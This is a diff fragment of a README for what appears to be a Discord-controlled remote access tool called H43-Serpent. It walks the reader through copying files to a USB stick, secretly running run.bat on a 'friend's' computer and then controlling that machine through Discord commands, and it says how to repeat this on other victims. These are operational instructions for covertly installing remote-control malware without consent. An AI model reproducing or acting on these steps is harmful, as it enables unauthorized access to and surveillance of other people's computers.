Fytex/H43-Serpent/README.md

 9. Save the config.ini
 10. Copy all the files to a Pen USB.
 11. When you are near your friend just plug the Pen USB in his computer and double click on `run.bat`
 11. Wait until the window closes which can take ~30s (there is a small chance that the dependencies are already installed which could reduce the time from ~30s to ~1s) and everything done.
+Wait 2s and unplug the Pen USB.
-Go back to the new server and run a command Target-Command.
+12. Go back to your computer/mobile and in your discord server which has the bot you should be able to run any command Target-Command.
 Ex: Fytex-help
-12. To view more info about each command do Target-help Command.
+13. To view more info about each command do Target-help Command.
 Ex: Fytex-help type

 If you want to put this program into another friend's computer just change the TARGET field to your new friend's name in the `config.ini` of your Pen USB.
 And repeat the process from 10 onwards.